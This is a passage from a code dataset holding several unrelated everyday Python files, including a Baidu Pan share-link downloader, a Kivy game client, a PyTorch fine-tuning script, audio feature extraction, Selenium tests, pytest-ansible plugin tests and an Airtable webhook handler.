Gecko) Chrome/49.0.2623.221 Safari/537.36 SE 2.X MetaSr 1.0'\n }\n try:\n response = requests.get(url, headers=headers1).content.decode('utf-8')\n js = re.findall(r'', response, re.DOTALL)[0]\n timestamp = re.findall(r'\"timestamp\":(.*?),', js, re.DOTALL)[0]\n sign = re.findall(r'\"sign\":\"(.*?)\"', js, re.DOTALL)[0]\n uk = re.findall(r'\"uk\":(.*?),', js, re.DOTALL)[0]\n primaryid = re.findall(r'\"shareid\":(.*?),', js, re.DOTALL)[0]\n fs_id = re.findall(r'\"fs_id\":(.*?),', js, re.DOTALL)[0]\n app_id = re.findall(r'\"app_id\":\"(.*?)\"', js, re.DOTALL)[0]\n data = {\n 'encrypt': '0',\n 'product': 'share',\n 'uk': str(uk),\n 'primaryid': str(primaryid),\n 'fid_list': \"[\" + fs_id + \"]\",\n 'path_list': ''\n }\n url1 = \"https://pan.baidu.com/api/sharedownload?sign=\" + sign + \"×tamp=\" + timestamp + \"bdstoken=null\" + \"&channel=chunlei&clienttype=0&web=1\" + \"&app_id=\" + str(\n app_id)\n post_down = requests.post(url=url1, headers=headers, data=data).text\n post_down1 = json.loads(post_down)\n dlink = ((post_down1[\"list\"])[0])['dlink']\n print(dlink)\n except:\n print(\"请求失败,请重新分享链接,确认本机IP未使用3次\")\n\n\nif __name__ == '__main__':\n url = input(\"请输入分享链接(需公开类型,且本机IP未使用3次):\")\n main(url)","sub_path":"baiduyun.py","file_name":"baiduyun.py","file_ext":"py","file_size_in_byte":1915,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"49"} +{"seq_id":"81135007","text":"import socket\nfrom re import match\nfrom time import sleep\nfrom kivy.app import App\n\nfrom kivy.clock import Clock\nfrom widgets.Starter import Starter\nfrom widgets.Game import Game\n\n\nclass Client(App):\n def __init__(self, **kwargs):\n super(Client, self).__init__(**kwargs)\n\n try:\n self.client_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n self.client_socket.connect((\"127.0.0.1\", 50005))\n self.client_socket.settimeout(0.1)\n\n except Exception as exc:\n print(\"Cant connect\", exc)\n\n self.data = \"\"\n self.game = Game(self.client_socket)\n self.data_receiver = Clock.schedule_interval(self.receive_data, 1)\n\n self.main_loop_clock = Clock.schedule_interval(self.main_loop, 1.2)\n self.main_content = Starter(self.client_socket)\n\n def receive_data(self, _):\n try:\n self.data = self.client_socket.recv(4096).decode(\"utf-8\")\n print(\":::\", self.data)\n\n except socket.timeout:\n pass\n\n def build(self):\n return self.main_content\n\n def main_loop(self, _):\n if self.data == \"game_look\":\n sleep(2)\n self.game.full_answer.text = \"Looking for game\"\n self.main_content.add_widget(self.game)\n\n self.main_loop_clock.cancel()\n self.main_loop_clock = Clock.schedule_interval(self.game_main, 1.2)\n\n def game_main(self, _):\n if match(\"guess\", self.data):\n first_bound = self.data[self.data.find(\";\") + 1:self.data.find(\":\")]\n if not first_bound:\n self.game.full_answer.text = \"An error occurred! Cant receive first bound!\"\n\n second_bound = self.data[self.data.find(\":\") + 1:]\n if not second_bound:\n self.game.full_answer.text = \"An error occurred! Cant receive second bound!\"\n\n self.game.full_answer.text = f\"Guess number between {first_bound} and {second_bound}\"\n\n elif match(\"wrong_bigger\", self.data) or match(\"wrong_smaller\", self.data):\n self.game.full_answer.text = f\"Number is {self.data[self.data.find('_') + 1:]}\"\n\n elif self.data == \"win\":\n self.game.full_answer.text = \"Well done!\"\n\n elif match(\"lose\", self.data):\n hp = int(self.data[self.data.find(\":\") + 1:])\n self.game.health.set_hp(hp)\n self.game.full_answer.text = \"You lose!\"\n\n elif self.data == \"game_win\":\n self.game.full_answer.text = \"You win the game!\"\n sleep(1)\n\n elif self.data == \"game_lose\":\n self.game.full_answer.text = \"You lost the game!\"\n sleep(1)\n\n else:\n self.game.full_answer.text = \"Waiting for second player's answer\"\n\n\nif __name__ == '__main__':\n Client().run()\n","sub_path":"client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":2815,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"49"} +{"seq_id":"374599889","text":"import sys\r\nimport torch\r\nimport torch.nn as nn\r\nimport torch.optim as optim\r\nfrom torch.optim import lr_scheduler\r\nfrom torch.autograd import Variable\r\nimport torchvision\r\nfrom torchvision import datasets, models, transforms\r\nimport time\r\nimport os\r\nimport copy\r\n\r\ndef print_now(item):\r\n print(item)\r\n sys.stdout.flush()\r\n\r\n######################################################################\r\n# Load Data\r\n# ---------\r\n#\r\n# We will use torchvision and torch.utils.data packages for loading the\r\n# data.\r\n#\r\n# The problem we're going to solve today is to train a model to classify\r\n# **ants** and **bees**. We have about 120 training images each for ants and bees.\r\n# There are 75 validation images for each class. Usually, this is a very\r\n# small dataset to generalize upon, if trained from scratch. Since we\r\n# are using transfer learning, we should be able to generalize reasonably\r\n# well.\r\n#\r\n# Data augmentation and normalization for training\r\n# Just normalization for validation\r\ndata_transforms = {\r\n 'train': transforms.Compose([\r\n transforms.RandomResizedCrop(224),\r\n transforms.RandomHorizontalFlip(),\r\n transforms.ToTensor(),\r\n transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])\r\n ]),\r\n 'val': transforms.Compose([\r\n transforms.Resize(256),\r\n transforms.CenterCrop(224),\r\n transforms.ToTensor(),\r\n transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])\r\n ]),\r\n}\r\n\r\ndata_dir = \"./training_data\" #this needs to change based on the user\r\n\r\nimage_datasets = {x: datasets.ImageFolder(os.path.join(data_dir, x),\r\n data_transforms[x])\r\n for x in ['train', 'val']}\r\n\r\ndataloaders = {x: torch.utils.data.DataLoader(image_datasets[x], batch_size=4,\r\n shuffle=True, num_workers=4)\r\n for x in ['train', 'val']}\r\n\r\ndataset_sizes = {x: len(image_datasets[x]) for x in ['train', 'val']}\r\nclass_names = image_datasets['train'].classes\r\n\r\nuse_gpu = torch.cuda.is_available()\r\nprint_now(\"Using GPU? \" + str(use_gpu))\r\n\r\n# Get a batch of training data\r\ninputs, classes = next(iter(dataloaders['train']))\r\n\r\n######################################################################\r\n# Training the model\r\n# ------------------\r\n#\r\n# Now, let's write a general function to train a model. Here, we will\r\n# illustrate:\r\n#\r\n# - Scheduling the learning rate\r\n# - Saving the best model\r\n#\r\n# In the following, parameter ``scheduler`` is an LR scheduler object from\r\n# ``torch.optim.lr_scheduler``.\r\n\r\n\r\ndef train_model(model, criterion, optimizer, scheduler, num_epochs=25):\r\n since = time.time()\r\n\r\n best_model_wts = copy.deepcopy(model.state_dict())\r\n best_acc = 0.0\r\n\r\n for epoch in range(num_epochs):\r\n print_now('Epoch {}/{}'.format(epoch, num_epochs - 1))\r\n print_now('-' * 10)\r\n\r\n # Each epoch has a training and validation phase\r\n for phase in ['train', 'val']:\r\n if phase == 'train':\r\n scheduler.step()\r\n model.train(True) # Set model to training mode\r\n else:\r\n model.train(False) # Set model to evaluate mode\r\n\r\n running_loss = 0.0\r\n running_corrects = 0\r\n\r\n # Iterate over data.\r\n for data in dataloaders[phase]:\r\n # get the inputs\r\n inputs, labels = data\r\n\r\n # wrap them in Variable\r\n if use_gpu:\r\n inputs = Variable(inputs.cuda())\r\n labels = Variable(labels.cuda())\r\n else:\r\n inputs, labels = Variable(inputs), Variable(labels)\r\n\r\n # zero the parameter gradients\r\n optimizer.zero_grad()\r\n\r\n # forward\r\n outputs = model(inputs)\r\n _, preds = torch.max(outputs.data, 1)\r\n loss = criterion(outputs, labels)\r\n\r\n # backward + optimize only if in training phase\r\n if phase == 'train':\r\n loss.backward()\r\n optimizer.step()\r\n\r\n # statistics\r\n running_loss += loss.item() * float(inputs.size(0))\r\n running_corrects += torch.sum(preds == labels.data).float()\r\n\r\n epoch_loss = running_loss / dataset_sizes[phase]\r\n epoch_acc = running_corrects / dataset_sizes[phase]\r\n\r\n print_now('{} Loss: {:.4f} Acc: {:.4f}'.format(\r\n phase, epoch_loss, epoch_acc))\r\n\r\n # deep copy the model\r\n if phase == 'val' and epoch_acc > best_acc:\r\n best_acc = epoch_acc\r\n best_model_wts = copy.deepcopy(model.state_dict())\r\n\r\n print_now(\"\\n\")\r\n\r\n time_elapsed = time.time() - since\r\n print_now('Training complete in {:.0f}m {:.0f}s'.format(\r\n time_elapsed // 60, time_elapsed % 60))\r\n \r\n print_now(\"Class to index: \" + str(image_datasets['train'].class_to_idx))\r\n print_now('Best val Acc: {:4f}'.format(best_acc))\r\n\r\n # load best model weights\r\n model.load_state_dict(best_model_wts)\r\n return model\r\n\r\n######################################################################\r\n# Finetuning the convnet\r\n# ----------------------\r\n#\r\n# Load a pretrained model and reset final fully connected layer.\r\n#\r\n\r\nmodel_ft = models.resnet18(pretrained=True)\r\nnum_ftrs = model_ft.fc.in_features\r\nmodel_ft.fc = nn.Linear(num_ftrs, 2)\r\n\r\nif use_gpu:\r\n model_ft = model_ft.cuda()\r\n\r\ncriterion = nn.CrossEntropyLoss()\r\n\r\n# Observe that all parameters are being optimized\r\noptimizer_ft = optim.SGD(model_ft.parameters(), lr=0.001, momentum=0.9)\r\n\r\n# Decay LR by a factor of 0.1 every 7 epochs\r\nexp_lr_scheduler = lr_scheduler.StepLR(optimizer_ft, step_size=7, gamma=0.1)\r\n\r\nmodel_ft = train_model(model_ft, criterion, optimizer_ft, exp_lr_scheduler,\r\n num_epochs=1)\r\ntorch.save(model_ft, \"./models/model.out\")\r\n\r\n","sub_path":"trainer.py","file_name":"trainer.py","file_ext":"py","file_size_in_byte":6027,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"49"} +{"seq_id":"621464433","text":"import json\nimport essentia\nimport essentia.standard as ess\nfrom essentia.standard import *\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom numpy import savetxt\nimport glob\nimport csv\nimport os\nfrom utils import get_json, save_as_json, save_matrix_array\nfrom utils import save_descriptors_as_matrix \nimport toolz as tz\n\n\ndef extract_mfccs(audio_file):\n loader = essentia.standard.MonoLoader(filename=audio_file)\n print(\"Analyzing:\" + audio_file)\n audio = loader()\n spectrum = Spectrum()\n melBands = MelBands()\n w = Windowing(type='hann')\n fft = FFT()\n\n name = audio_file.split('/')[1].split('.')[-2]\n print(name)\n\n pool = essentia.Pool()\n for frame in ess.FrameGenerator(audio, frameSize=2048, hopSize=2048, startFromZero=True): #for chroma frameSize=8192*2, hopSize=8192, #fz=88200, hs=44100\n mag, phase, = CartesianToPolar()(fft(w(frame)))\n mfcc_bands, mfcc_coeffs = MFCC(numberCoefficients=13)(mag)\n loudness = Loudness()(mag)\n contrast, spectralValley = SpectralContrast()(mag)\n flatness = Flatness()(mag) \n centroid = Centroid()(mag)\n spectral_complex = SpectralComplexity()(mag)\n #mel_bands = melBands(spectrum(w(frame)))\n #dynamic_complexity, loudness = DynamicComplexity()(mag)\n #croma = Chromagram(sampleRate=2048*5)(mag[1:],)\n #onset = OnsetDetection()(mag,phase)\n \n #['flatness', 'mfccVar','complexity','mfccMean','loudness','centroid','spectralContrast'],\n\n pool.add('lowlevel.mfcc', mfcc_coeffs)\n pool.add('lowlevel.loudness', [loudness])\n pool.add('lowlevel.spectralcontrast', contrast)\n pool.add('lowlevel.flatness', [flatness])\n pool.add('lowlevel.spectral_complexity', [spectral_complex])\n pool.add('lowlevel.centroid', [centroid])\n #pool.add('lowlevel.onsets', [onset])\n #pool.add('lowlevel.melbands', mel_bands)\n #pool.add('lowlevel.dyncomplex', [dynamic_complexity])\n #pool.add('lowlevel.chroma', croma)\n #pool.add('lowlevel.dens', dens)\n \n pool.add('audio_file', (name))\n aggrPool = PoolAggregator(defaultStats=['mean','var'])(pool)\n\n YamlOutput(filename='features.json', format='json',\n writeVersion=False)(aggrPool)\n\n json_data = get_json(\"features.json\")\n #dyncomp = json_data['lowlevel']['dynamic_complexity']['mean']\n\n #SCMIR Audio Features\n #[[MFCC],[Chromagram],[SpecPcile, 0.95],[SpecPcile, 0.80],[SpecFlatness]];\n #['flatness', 'mfccVar','complexity','mfccMean','loudness','centroid','spectralContrast'],\n\n\n #os.remove(\"mfccmean.json\")\n return {\"file\": json_data['audio_file'],\n \"flatness\": json_data['lowlevel']['flatness']['mean'],\n \"mfccVar\": json_data['lowlevel']['mfcc']['var'],\n \"complexity\": json_data['lowlevel']['spectral_complexity']['mean'],\n \"mfccMean\": json_data['lowlevel']['mfcc']['mean'],\n \"loudness\": json_data['lowlevel']['loudness']['mean'],\n \"centroid\": json_data['lowlevel']['centroid']['mean'],\n \"spectralContrast\": json_data['lowlevel']['spectralcontrast']['mean'],\n #\"mel\": json_data['lowlevel']['melbands']['mean'],\n # \"chroma\": json_data['lowlevel']['chroma']['mean'],\n #\"onsets\": json_data['lowlevel']['onsets']['mean'],\n #\"dyncomplexity\": json_data['lowlevel']['dyncomplex']['mean'],\n #\"dens\": json_data['lowlevel']['dens']['mean'],\n #\"densVar\": json_data['lowlevel']['dens']['var'],\n }\n\ndef extract_all_mfccs(audio_files):\n print(\"Extracting Features\")\n return list(map(extract_mfccs, audio_files))\n\ndef getProps(props, dict):\n return map(lambda prop: dict[prop], props)\n\ndef concat_features(input_data):\n features = list(map(lambda data: \n list(tz.concat(getProps(\n #['flatness', 'complexity', 'dyncomplexity','mfccMean','onsets'],\n ['flatness', 'mfccVar','complexity','mfccMean','loudness','centroid','spectralContrast'],\n #['mfccMean','flatness', 'complexity', 'onsets'],\n #['mfccMean', 'mfccVar'],\n #['loudness', 'file'],\n data))),\n input_data))\n #print(features)\n return features\n\ndef save_as_matrix(features):\n save_descriptors_as_matrix('database_names.csv', features)\n\n#test\n\n#input_data = extract_all_mfccs(sorted(glob.glob('Segments/' + \"*.wav\")))\n#print(input_data)\n#save_as_matrix(concat_features(input_data))\n","sub_path":"feature_extract_.py","file_name":"feature_extract_.py","file_ext":"py","file_size_in_byte":4548,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"49"} +{"seq_id":"264426610","text":"from time import sleep #导入时间模块响应的时间\n\nfrom selenium.webdriver import ActionChains#导入界面元素类\nfrom selenium.webdriver.common.keys import Keys\n\n\ndef test_input(driver):#纯输入框,输入内容\n driver.get(\"http://ui.yansl.com/#/input\")\n sleep(2)\n\n input =driver.find_element_by_xpath(\"//input[@name='t1']\")\n input.clear()\n input.send_keys(\"我是你大爷��很牛的我\")\n sleep(5)\n\ndef test_radio(driver):#\n driver.get(\"http://ui.yansl.com/#/radio\")\n sleep(1)\n\n radio =driver.find_element_by_xpath(\"//input[@name='sex'][2]\")\n #点击\n radio.click()\n sleep(2)\n\ndef test_checkbox(driver):\n driver.get(\"http://ui.yansl.com/#/checkbox\")\n sleep(2)\n\n checkbox=driver.find_element_by_xpath(\"//label[text()='多选框2']/..//span[1]\")\n attribute = checkbox.get_attribute(\"class\")\n if not attribute=='el-checkbox is-checked':\n checkbox.click()\n sleep(5)\n checkbox = driver.find_element_by_xpath(\"//label[text()='多选框2']/..//span[1]\")\n attribute = checkbox.get_attribute(\"class\")\n if attribute == 'el-checkbox is-checked':\n checkbox.click()\n sleep(5)\ndef test_select(driver): #\n driver.get(\"http://ui.yansl.com/#/select\")\n sleep(2)\n\n select =driver.find_element_by_xpath(\"//label[text()='下拉框2']/../div/div\")\n #点击\n select.click()\n sleep(2)\n option = driver.find_element_by_xpath(\"(//span[text()='双皮奶'])[last()]\")\n actions = ActionChains(driver) #界面元素\n actions.move_to_element(option).perform() #perform去执行\n sleep(2)\n option.click() #点击\n sleep(2) #响应时间\n\ndef test_slider(driver):\n driver.get(\"http://ui.yansl.com/#/slider\") #打开网址\n sleep(2)\n\n slider = driver.find_element_by_xpath(\"//label[text()='竖向选择']/../div/div/div/div/div\")\n sleep(2)\n actions = ActionChains(driver)\n actions.drag_and_drop_by_offset(slider,0,-200).perform()\n sleep(2)\n\ndef test_time(driver):\n driver.get(\"http://ui.yansl.com/#/dateTime\")\n sleep(1)\n\n t1=driver.find_element_by_xpath(\"//label[text()='固定时间']/../div/div/input\")\n t1.clear()\n t1.send_keys(\"14:19:25\")\n sleep(2)\n","sub_path":"demo/test_browser.py","file_name":"test_browser.py","file_ext":"py","file_size_in_byte":2338,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"49"} +{"seq_id":"250495314","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nfrom sympy import FiniteSet\n\ns = FiniteSet(1, 2, 3, 4, 5, 6)\na = FiniteSet(2, 3, 5)\nb = FiniteSet(1, 3, 5)\ne = a.union(b)\nprint(\"len(e)/len(s)={0}\".format(len(e)/len(s)))\n","sub_path":"chapter5/5_2_1.py","file_name":"5_2_1.py","file_ext":"py","file_size_in_byte":218,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"} +{"seq_id":"243922203","text":"from django.conf import settings\nfrom django.conf.urls import include, url\nfrom django.contrib import admin\n\nfrom welcome.views import *\nfrom HFactor.views import *\nfrom Polls.views import *\nfrom welcome.forms import *\napp_name = 'welcome'\n\nurlpatterns = [\n url(r'^portfolio_1$', portfolio_1 , name='portfolio_1'),\n url(r'^Paper$', BluePaper , name='Blue_Paper'),\n url(r'^portfolio_2$', portfolio_2 , name='portfolio_2'),\n url(r'^portfolio_3$', portfolio_3 , name='portfolio_3'),\n url(r'^portfolio_4$', portfolio_4 , name='portfolio_4'),\n url(r'^portfolio_item$', portfolio_item , name='portfolio_item'),\n url(r'^blog-home-1$', blog_item_1 , name='blog-home-1'),\n url(r'^blog-home-2$', blog_item_2 , name='blog-home-2'),\n url(r'^blog_item_3$', blog_item_3 , name='blog_item_3'),\n url(r'^full_width$', full_width , name='full_width'),\n url(r'^sidebar$', sidebar , name='sidebar'),\n url(r'^ContactModelFormView$', ContactFormView.as_view(\n template_name=\"welcome/Base/contacta.html\",\n form_class = BasicContactForm,\n ), name=\"contacta\"),\n url(r'^completed$', CompletedPage.as_view(), name=\"completed\"),\n]\n","sub_path":"welcome/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1162,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"} +{"seq_id":"206358589","text":"'''\nlenA, lenB, sum_needed = [int(x) for x in input().split()]\nA = [int(x) for x in input().split()]\nB = [int(x) for x in input().split()]\n\nsums = 0\ncache=[]\n\nwhile sums <= sum_needed:\n cache.append(A.pop(0))\n sums += cache[-1]\n\ncount = len(cache)\nmax_now = count\nscore = 0\nfor i in range(lenB):\n score += B.pop(0)\n count += 1\n while score > sum_needed and count > 0 and len(cache) >0:\n count -= 1\n score -= cache.pop()\n if score <= sum_needed and count > max_now:\n max_now = count\nprint(max_now)\n'''\nimport bisect\nfrom itertools import accumulate\nfor _ in range(int(input())):\n lA, lB, X = [int(x) for x in input().split()]\n A = [int(x) for x in input().split()]\n B = [int(x) for x in input().split()]\n AC = [0] + list(accumulate(A))\n BC = [0] + list(accumulate(B))\n\n ans = 0\n for i, x in enumerate(AC):\n if x > X:break\n j = bisect.bisect(BC, X-x)\n if j >= 0:\n ans = max(ans, i+j-1)\n print(ans)\n\n'''\nfrom sys import stdin\nrr = lambda: stdin.readline().strip()\nrrm = lambda: map(int, rr().split())\n\nimport bisect\ndef solve(X, A, B):\n Pa, Pb = [0], [0]\n for x in A:\n Pa.append(Pa[-1] + x)\n for x in B:\n Pb.append(Pb[-1] + x)\n print(Pa, Pb)\n ans = 0\n #Pa[i] + Pb[j] <= X means a score of i+j\n for i, x in enumerate(Pa):\n if x > X: break\n j = bisect.bisect(Pb, X-x)\n if j >= 0:\n ans = max(ans, i + j - 1)\n return ans\n\nfor _ in xrange(int(rr())):\n print solve(rrm()[2], rrm(), rrm())\n'''\n\n\n\n\n\n\n","sub_path":"Hackerrank/game_of_two_stacks_1.py","file_name":"game_of_two_stacks_1.py","file_ext":"py","file_size_in_byte":1559,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"} +{"seq_id":"336087682","text":"import sys\nimport pytest\nimport ansible\nimport mock\nfrom _pytest.main import EXIT_OK, EXIT_TESTSFAILED, EXIT_USAGEERROR, EXIT_NOTESTSCOLLECTED, EXIT_INTERRUPTED\n\nif sys.version_info[0] == 2:\n import __builtin__ as builtins # NOQA\nelse:\n import builtins # NOQA\n\n\ndef test_plugin_help(testdir):\n \"\"\"Verifies expected output from of py.test --help\"\"\"\n\n result = testdir.runpytest('--help')\n result.stdout.fnmatch_lines([\n # Check for the github args section header\n 'pytest-ansible:',\n # Check for the specific args\n ' --ansible-inventory=ANSIBLE_INVENTORY',\n ' --ansible-host-pattern=ANSIBLE_HOST_PATTERN',\n ' --ansible-connection=ANSIBLE_CONNECTION',\n ' --ansible-user=ANSIBLE_USER',\n ' --ansible-debug *',\n ' --ansible-sudo *',\n ' --ansible-sudo-user=ANSIBLE_SUDO_USER',\n ' --ansible-become *',\n ' --ansible-become-method=ANSIBLE_BECOME_METHOD',\n ' --ansible-become-user=ANSIBLE_BECOME_USER',\n # Check for the marker in --help\n ' ansible (args) * Ansible integration',\n ])\n\n\ndef test_plugin_markers(testdir):\n \"\"\"Verifies expected output from of py.test --markers\"\"\"\n\n result = testdir.runpytest('--markers')\n result.stdout.fnmatch_lines([\n '@pytest.mark.ansible(*args): Ansible integration',\n ])\n\n\ndef test_report_header(testdir, option):\n \"\"\"Verify the expected ansible version in the pytest report header.\n \"\"\"\n\n result = testdir.runpytest(*option.args)\n assert result.ret == EXIT_NOTESTSCOLLECTED\n result.stdout.fnmatch_lines([\n 'ansible: %s' % ansible.__version__,\n ])\n\n\ndef test_params_not_required_when_not_using_fixture(testdir, option):\n \"\"\"Verify the ansible parameters are not required if the fixture is not used.\n \"\"\"\n\n src = \"\"\"\n import pytest\n def test_func():\n assert True\n \"\"\"\n testdir.makepyfile(src)\n result = testdir.runpytest(*option.args)\n assert result.ret == EXIT_OK\n\n\ndef test_params_required_when_using_fixture(testdir, option):\n \"\"\"Verify the ansible parameters are required if the fixture is used.\n \"\"\"\n\n src = \"\"\"\n import pytest\n def test_func(ansible_module):\n assert True\n \"\"\"\n testdir.makepyfile(src)\n result = testdir.runpytest(*option.args)\n assert result.ret == EXIT_USAGEERROR\n result.stderr.fnmatch_lines([\n 'ERROR: Missing required parameter --ansible-host-pattern',\n ])\n\n\ndef test_params_required_with_host_generator(testdir, option):\n \"\"\"Verify the ansible parameters are required if the fixture is used.\n \"\"\"\n\n src = \"\"\"\n import pytest\n def test_func(ansible_host):\n assert True\n \"\"\"\n testdir.makepyfile(src)\n result = testdir.runpytest(*option.args)\n assert result.ret == EXIT_TESTSFAILED\n result.stdout.fnmatch_lines([\n 'collected 0 items / 1 errors',\n 'E UsageError: Missing required parameter --ansible-host-pattern',\n ])\n\n\ndef test_params_required_with_group_generator(testdir, option):\n \"\"\"Verify the ansible parameters are required if the fixture is used.\n \"\"\"\n\n src = \"\"\"\n import pytest\n def test_func(ansible_group):\n assert True\n \"\"\"\n testdir.makepyfile(src)\n result = testdir.runpytest(*option.args)\n assert result.ret == EXIT_TESTSFAILED\n result.stdout.fnmatch_lines([\n 'collected 0 items / 1 errors',\n 'E UsageError: Missing required parameter --ansible-host-pattern',\n ])\n\n\n@pytest.mark.parametrize(\n \"required_value_parameter\",\n [\n '--ansible-inventory',\n '--ansible-host-pattern',\n '--ansible-connection',\n '--ansible-user',\n '--ansible-sudo-user',\n '--ansible-become-method',\n '--ansible-become-user',\n ],\n)\ndef test_param_requires_value(testdir, required_value_parameter):\n \"\"\"Verifies failure when not providing a value to a parameter that requires a value\"\"\"\n\n result = testdir.runpytest(*[required_value_parameter])\n assert result.ret == EXIT_INTERRUPTED\n result.stderr.fnmatch_lines([\n '*: error: argument %s: expected one argument' % required_value_parameter,\n ])\n\n\ndef test_params_required_with_inventory_without_host_pattern(testdir, option):\n src = \"\"\"\n import pytest\n def test_func(ansible_module):\n assert True\n \"\"\"\n testdir.makepyfile(src)\n result = testdir.runpytest(*option.args + ['--ansible-inventory', 'local,'])\n assert result.ret == EXIT_USAGEERROR\n result.stderr.fnmatch_lines([\n 'ERROR: Missing required parameter --ansible-host-pattern',\n ])\n\n\n@pytest.mark.requires_ansible_v1\ndef test_params_required_with_bogus_inventory_v1(testdir, option):\n src = \"\"\"\n import pytest\n def test_func(ansible_module):\n assert True\n \"\"\"\n testdir.makepyfile(src)\n with mock.patch('os.path.exists', return_value=False) as mock_exists:\n result = testdir.runpytest(*['--ansible-inventory', 'bogus', '--ansible-host-pattern', 'all'])\n\n # Assert py.test exit code\n assert result.ret == EXIT_TESTSFAILED\n\n # Assert expected error output\n result.stdout.fnmatch_lines([\n '*UsageError: Unable to find an inventory file, specify one with -i ?',\n ])\n\n # Assert mock open called on provided file\n mock_exists.assert_any_call('bogus')\n\n\n@pytest.mark.requires_ansible_v2\ndef test_params_required_with_bogus_inventory_v2(testdir, option, recwarn):\n src = \"\"\"\n import pytest\n def test_func(ansible_module):\n ansible_module.ping()\n \"\"\"\n testdir.makepyfile(src)\n\n with mock.patch('ansible.parsing.dataloader.DataLoader.path_exists', return_value=False) as mock_exists:\n # with mock.patch('ansible.parsing.dataloader.DataLoader.is_file', return_value=False) as mock_isfile:\n result = testdir.runpytest(*['-vvvvvs', '--ansible-inventory', 'bogus', '--ansible-host-pattern', 'all'])\n\n # Assert py.test exit code\n # assert result.ret == EXIT_OK\n assert result.ret == EXIT_TESTSFAILED\n\n # TODO - assert the following warning appears\n # [WARNING]: provided hosts list is empty, only localhost is available\"\n if False:\n result.stderr.fnmatch_lines(\n [\n \"*provided hosts list is empty, only localhost is available\",\n ]\n )\n\n # Assert mock open called on provided file\n mock_exists.assert_any_call('bogus')\n\n\n@pytest.mark.requires_ansible_v1\ndef test_params_required_without_inventory_with_host_pattern_v1(testdir, option):\n src = \"\"\"\n import pytest\n def test_func(ansible_module):\n assert True\n \"\"\"\n testdir.makepyfile(src)\n result = testdir.runpytest(*option.args + ['--ansible-host-pattern', 'all'])\n assert result.ret == EXIT_TESTSFAILED\n result.stdout.fnmatch_lines([\n 'UsageError: Unable to find an inventory file, specify one with -i ?',\n ])\n\n\n@pytest.mark.requires_ansible_v2\ndef test_params_required_without_inventory_with_host_pattern_v2(testdir, option):\n src = \"\"\"\n import pytest\n def test_func(ansible_module):\n assert True\n \"\"\"\n testdir.makepyfile(src)\n result = testdir.runpytest(*option.args + ['--ansible-host-pattern', 'all'])\n assert result.ret == EXIT_OK\n\n # TODO - validate the following warning message\n # [WARNING]: provided hosts list is empty, only localhost is available\n if False:\n result.stderr.fnmatch_lines(\n [\n \"*provided hosts list is empty, only localhost is available\",\n ]\n )\n\n\ndef test_param_override_with_marker(testdir):\n src = \"\"\"\n import pytest\n @pytest.mark.ansible(inventory='local,', connection='local', host_pattern='all')\n def test_func(ansible_module):\n ansible_module.ping()\n \"\"\"\n testdir.makepyfile(src)\n result = testdir.runpytest(*['-vvvvvs', '--tb', 'native', '--ansible-inventory', 'garbage,', '--ansible-host-pattern',\n 'garbage', '--ansible-connection', 'garbage'])\n assert result.ret == EXIT_OK\n\n # Mock assert the correct variables are set\n","sub_path":"tests/test_params.py","file_name":"test_params.py","file_ext":"py","file_size_in_byte":8215,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"} +{"seq_id":"289490450","text":"import asyncio\nimport logging\n\nfrom aiohttp.web_response import Response\n\nlogger = logging.getLogger(__name__)\n\n\nasync def incoming_request(request):\n airtable = request.app.plugins[\"airtable\"]\n payload = await request.json()\n logger.debug(\"Incoming Airtable event payload: %s\", payload)\n\n if payload[\"token\"] != airtable.verify:\n return Response(status=401)\n\n futures = list(_dispatch(airtable.routers[\"request\"], payload, request.app))\n if futures:\n return await _wait_and_check_result(futures)\n return Response(status=200)\n\n\ndef _dispatch(router, event, app):\n for handler, configuration in router.dispatch(event):\n f = asyncio.ensure_future(handler(event, app))\n if configuration[\"wait\"]:\n yield f\n else:\n f.add_done_callback(_callback)\n\n\ndef _callback(f):\n try:\n f.result()\n except Exception as e:\n logger.exception(e)\n\n\nasync def _wait_and_check_result(futures):\n dones, _ = await asyncio.wait(futures, return_when=asyncio.ALL_COMPLETED)\n try:\n results = [done.result() for done in dones]\n except Exception as e:\n logger.exception(e)\n return Response(status=500)\n\n results = [result for result in results if isinstance(result, Response)]\n if len(results) > 1:\n logger.warning(\"Multiple web.Response for handler, returning none\")\n elif results:\n return results[0]\n\n return Response(status=200)\n","sub_path":"pybot/plugins/airtable/endpoints.py","file_name":"endpoints.py","file_ext":"py","file_size_in_byte":1456,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"} +{"seq_id":"580970371","text":"import json\n\ndef error_msg(error_number):\n error_dict = {\n 1: \"Error : Area of property should be an integer\",\n 2: \"Error: Type of property should be an House/Apartment/Others\",\n 3: \"Error: Number of Rooms of property should be an integer\",\n 4: \"Error: Zip code of property should be an integer\",\n }\n\n error = error_dict.get(error_number)\n\n return print(error)\n\n\ndef preprocess(json_data_for_property):\n x = json_data_for_property\n\n # parse x:\n y = json.loads(x) \n\n # the result is a Python dictionary:\n\n #checking for valid inputs and giving errors in case inputs are invalid\n if type(y[\"data\"][\"area\"])is not int : \n return error_msg(1)\n if y[\"data\"][\"property-type\"].upper() not in [\"APARTMENT\",\"HOUSE\",\"OTHERS\"] : \n return error_msg(2)\n if type(y[\"data\"][\"rooms-number\"]) is not int:\n return error_msg(3)\n if type(y[\"data\"][\"zip-code\"]) is not int:\n return error_msg(4) \n \n return y\n\nhome = '{\t\"data\": { \"area\": 56 , \"property-type\": \"APATMENT\" , \"rooms-number\": 2, \"zip-code\":48326} }'\nprint(preprocess(home))\n\npreprocess()\n'''{\n \"data\": {\n \"area\": 